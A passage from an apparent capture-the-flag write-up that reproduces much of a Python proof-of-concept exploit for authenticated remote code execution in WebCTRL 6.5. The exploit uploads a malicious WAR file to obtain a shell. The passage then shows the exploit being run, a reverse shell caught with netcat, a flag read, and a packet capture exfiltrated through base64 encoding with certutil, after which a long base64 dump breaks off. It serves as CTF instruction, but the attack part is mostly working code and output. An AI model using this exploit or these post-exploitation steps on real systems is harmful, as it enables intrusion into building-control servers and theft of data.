try: checkhost = opener.open('http://'+host+'/index.jsp?operatorlocale=en')except urllib2.HTTPError, errorzio: if errorzio.code == 404: print '[!] Error 001:' print '[-] Check your target!' print sys.exit()except URLError, errorziocvaj: if errorziocvaj.reason: print '[!] Error 002:' print '[-] Check your target!' print sys.exit()
print '[+] Target seems OK.'
print '[+] Sending payload.'
class MultiPartForm(object):
def __init__(self): self.form_fields = [] self.files = [] self.boundary = mimetools.choose_boundary() return
def get_content_type(self): return 'multipart/form-data; boundary=%s' % self.boundary
def add_field(self, name, value): self.form_fields.append((name, value)) return
def add_file(self, fieldname, filename, fileHandle, mimetype=None): body = fileHandle.read() if mimetype is None: mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream' self.files.append((fieldname, filename, mimetype, body)) return
def __str__(self):
parts = [] part_boundary = '--' + self.boundary
parts.extend( [ part_boundary, 'Content-Disposition: form-data; name="%s"' % name, '', value, ] for name, value in self.form_fields )
parts.extend( [ part_boundary, 'Content-Disposition: file; name="%s"; filename="%s"' % \ (field_name, filename), 'Content-Type: %s' % content_type, '', body, ] for field_name, filename, content_type, body in self.files )
flattened = list(itertools.chain(*parts)) flattened.append('--' + self.boundary + '--') flattened.append('') return '\r\n'.join(flattened)
if __name__ == '__main__': try: form = MultiPartForm() form.add_field('wbs', token) form.add_field('file"; filename="'+filename, bindata) request = urllib2.Request('http://'+host+'/_common/servlet/lvl5/uploadwarfile') request.add_header('User-agent', 'SCADA/8.0') body = str(form) request.add_header('Content-type', form.get_content_type()) request.add_header('Cookie', cookies) request.add_header('Content-length', len(body)) request.add_data(body) request.get_data() urllib2.urlopen(request).read()
print '[+] Payload uploaded.' print '[+] Shell available at: http://'+host+'/'+filename[:-4] print except urllib2.HTTPError as e: print e.code print e.read()
sys.exit()```
The exploit can be launched with a command like the following.
```m3ssap0@server:~$ python2 exploit.py percival4.ctf.umbccd.io m3ssap0.war "JSESSIONID=5F744836401DA55CDC1474DAFA1B7E6F; JSESSIONIDSSO=9FB32E3316D9800C4C96890CCBE3FE99" 59
@-------------------------------------------------@ | | | WebCTRL 6.5 Authenticated RCE PoC | | ID: ZSL-2017-5431 | | Copyleft (c) 2017, Zero Science Lab | | | @-------------------------------------------------@
[+] Probing target http://percival4.ctf.umbccd.io[+] Target seems OK.[+] Sending payload.[+] Payload uploaded.[+] Shell available at: http://percival4.ctf.umbccd.io/m3ssap0```
At this point, visiting the `http://percival4.ctf.umbccd.io/m3ssap0` will spawn a shell on your listening server. You can now find the flag.
```m3ssap0@server:~$ nc -lvk 1337Listening on [0.0.0.0] (family 0, port 1337)Connection from ec2-52-202-94-107.compute-1.amazonaws.com 49557 received!Microsoft Windows [Version 6.1.7601]Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\WebCTRL6.0>cd ..cd ..
C:\>dirdir Volume in drive C has no label. Volume Serial Number is EECC-6B81
Directory of C:\
2020-04-08 15:03 130 FLAG.TXT2009-07-13 23:20 <DIR> PerfLogs2020-04-10 00:12 <DIR> Program Files2019-11-04 20:28 <DIR> Program Files (x86)2019-07-29 12:34 <DIR> Users2020-04-11 16:24 <DIR> WebCTRL6.02020-04-10 00:23 <DIR> Windows 1 File(s) 130 bytes 6 Dir(s) 20,858,126,336 bytes free
C:\>type FLAG.TXTtype FLAG.TXTDawgCTF{t0mc@t_3xplo1t5}Go to C:\Program Files (x86)\Mozilla Maintenance Service\MySpecialNetCaps\README.txt for another clue.```
The flag is the following
```DawgCTF{t0mc@t_3xplo1t5}```
At this point, two new hidden challenges are unlocked under web/networking category. The `FLAG.TXT` file talks about another file related to new challenges.
You can read it with the following commands.
```C:\WebCTRL6.0>type "C:\Program Files (x86)\Mozilla Maintenance Service\MySpecialNetCaps\README.txt"type "C:\Program Files (x86)\Mozilla Maintenance Service\MySpecialNetCaps\README.txt"The PCAP file in this directory contains some data about what traffic happens in this server. There is an embedded device and some traffic that was being debugged here.What is the IP of the embedded device?What protocol is the embedded device communicating with?What is sent to reset the device?
C:\WebCTRL6.0>cd "C:\Program Files (x86)\Mozilla Maintenance Service\MySpecialNetCaps\"cd "C:\Program Files (x86)\Mozilla Maintenance Service\MySpecialNetCaps\"
C:\Program Files (x86)\Mozilla Maintenance Service\MySpecialNetCaps>dirdir Volume in drive C has no label. Volume Serial Number is EECC-6B81
Directory of C:\Program Files (x86)\Mozilla Maintenance Service\MySpecialNetCaps
2020-04-08 15:03 304 README.txt2020-04-08 14:50 41,029 webctrl_out.pcap 2 File(s) 41,333 bytes 0 Dir(s) 20,857,974,784 bytes free
```
To exfiltrate `webctrl_out.pcap` you can convert it into base64 and then print it, in order to copy-paste data without problems due to the presence of binary values.
```C:\Program Files (x86)\Mozilla Maintenance Service\MySpecialNetCaps>certutil -encode webctrl_out.pcap foo.txtcertutil -encode webctrl_out.pcap foo.txtInput Length = 41029Output Length = 56474CertUtil: -encode command completed successfully.
C:\Program Files (x86)\Mozilla Maintenance Service\MySpecialNetCaps>type foo.txttype foo.txt-----BEGIN CERTIFICATE-----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